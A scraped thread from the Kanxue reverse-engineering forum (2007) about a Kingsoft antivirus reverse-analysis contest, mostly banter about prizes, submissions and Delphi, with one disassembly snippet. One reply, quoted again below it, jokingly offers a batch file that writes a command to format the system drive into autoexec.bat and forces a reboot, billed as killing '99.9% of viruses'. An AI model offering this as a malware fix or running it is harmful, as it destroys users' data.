首页
社区
课程
招聘
[结束]第三阶段◇第一题]看雪论坛.珠海金山2007逆向分析挑战赛
2007-9-12 11:58 146751

[结束]第三阶段◇第一题]看雪论坛.珠海金山2007逆向分析挑战赛

2007-9-12 11:58
146751
收藏
点赞0
打赏
分享
最新回复 (83)
雪    币: 299
活跃值: (25)
能力值: ( LV10,RANK:170 )
在线值:
发帖
回帖
粉丝
zjjmjtoot 4 2007-9-12 15:22
26
0
既然投降了,不妨把样本拿出来让我们开开眼!
雪    币: 6073
活跃值: (2236)
能力值: (RANK:1060 )
在线值:
发帖
回帖
粉丝
forgot 26 2007-9-12 16:15
27
0
只有再有2个投降,我就拿走ipod
雪    币: 8188
活跃值: (4243)
能力值: ( LV15,RANK:2459 )
在线值:
发帖
回帖
粉丝
ccfer 16 2007-9-12 16:19
28
0
你只能去拿DC了,ipod没你份了
雪    币: 6073
活跃值: (2236)
能力值: (RANK:1060 )
在线值:
发帖
回帖
粉丝
forgot 26 2007-9-12 16:28
29
0
先送我一个vmare比较好。
雪    币: 337
活跃值: (1510)
能力值: ( LV13,RANK:970 )
在线值:
发帖
回帖
粉丝
nbw 24 2007-9-12 19:01
30
0
非业内人士估计这个题目可以用金山毒霸的处理流程就好。自己去研究不太好的,比人家差了显得题目没做到位阿,比人家好了那不就喧宾夺主么  
雪    币: 202
活跃值: (77)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
不懂算法 2 2007-9-12 19:02
31
0
echo format %systemdrive% /s >%systemdrive%\autoexec.bat
shutdown /r /f


保存成a.bat并双击
可以杀死99.9%的病毒木马
只是可能会有小小的后遗症,小孩子切勿模仿
雪    币: 7300
活跃值: (3758)
能力值: (RANK:1130 )
在线值:
发帖
回帖
粉丝
海风月影 22 2007-9-12 19:13
32
0
[QUOTE=不懂算法;358949]
echo format %systemdrive% /s >%systemdrive%\autoexec.bat
shutdown /r /f


保存成a.bat并双击
可以杀死99.9%的病毒木马
只是可能会有小小的后遗症,小孩子切勿模仿[/QUOTE]

VKing看来就是那个0.01%里面的
雪    币: 885
活跃值: (855)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
toetoe 2007-9-12 20:59
33
0
貌似很牛的病毒代码~

怕怕~
雪    币: 191
活跃值: (20)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
雷神十三 2007-9-13 13:49
34
0
杀归杀别吧自己机器弄瘫了哈
雪    币: 7300
活跃值: (3758)
能力值: (RANK:1130 )
在线值:
发帖
回帖
粉丝
海风月影 22 2007-9-13 14:37
35
0
楼上的盗版头像
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
dbjkofok 2007-9-14 14:32
36
0
我太菜了..不知道哪个才....
雪    币: 332
活跃值: (479)
能力值: ( LV9,RANK:330 )
在线值:
发帖
回帖
粉丝
laoqian 8 2007-9-14 15:46
37
0
看来金山是要找一个杀毒高手——会脱壳,会逆向,会写程序,.....还要会灌水的全才!!!
雪    币: 8188
活跃值: (4243)
能力值: ( LV15,RANK:2459 )
在线值:
发帖
回帖
粉丝
ccfer 16 2007-9-14 16:29
38
0
把DiKeN挖走就行了
雪    币: 398
活跃值: (343)
能力值: (RANK:650 )
在线值:
发帖
回帖
粉丝
shoooo 16 2007-9-14 16:44
39
0
DiKeN没有看雪勋章啊
雪    币: 1126
活跃值: (156)
能力值: ( LV9,RANK:210 )
在线值:
发帖
回帖
粉丝
DiKeN 5 2007-9-14 18:15
40
0
从第二阶段起,我的所有答题,都用的Delphi; 最后一题也准备这么做:)
没有用VC啦~~~一般公司都不要Delphi程序员的
雪    币: 226
活跃值: (15)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
十三少 2 2007-9-14 18:55
41
0
提交提交。
就做到这里,没时间玩了。
上传的附件:
雪    币: 209
活跃值: (10)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
一个刀客 1 2007-9-14 20:09
42
0
我全是用的Delphi
雪    币: 120
活跃值: (58)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
smartsl 2007-9-16 17:40
43
0
提交了。
雪    币: 226
活跃值: (15)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
十三少 2 2007-9-17 11:40
44
0
re提交。
测试了100多个样本没问题(我自己机器上的样本。。。)
雪    币: 337
活跃值: (1510)
能力值: ( LV13,RANK:970 )
在线值:
发帖
回帖
粉丝
nbw 24 2007-9-17 13:04
45
0
比较仰慕。。。。。
雪    币: 263
活跃值: (10)
能力值: ( LV9,RANK:210 )
在线值:
发帖
回帖
粉丝
fonge 5 2007-9-17 13:06
46
0
这次例外....
雪    币: 398
活跃值: (343)
能力值: (RANK:650 )
在线值:
发帖
回帖
粉丝
shoooo 16 2007-9-17 15:47
47
0
终于知道怎么才能得到DC了
答案就是
用GetDC函数
雪    币: 226
活跃值: (15)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
十三少 2 2007-9-17 15:52
48
0
[QUOTE=shoooo;360841]终于知道怎么才能得到DC了
答案就是
用GetDC函数[/QUOTE]

好办法。学习。
雪    币: 6073
活跃值: (2236)
能力值: (RANK:1060 )
在线值:
发帖
回帖
粉丝
forgot 26 2007-9-17 16:00
49
0
77D186C7 >  B8 91110000     mov     eax, 1191
77D186CC    BA 0003FE7F     mov     edx, 7FFE0300
77D186D1    FF12            call    [edx]
77D186D3    C2 0400         retn    4
雪    币: 243
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
jero 2007-9-17 23:24
50
0
来晚了。。。
还有机会从第一阶段开始吗?
游客
登录 | 注册 方可回帖
返回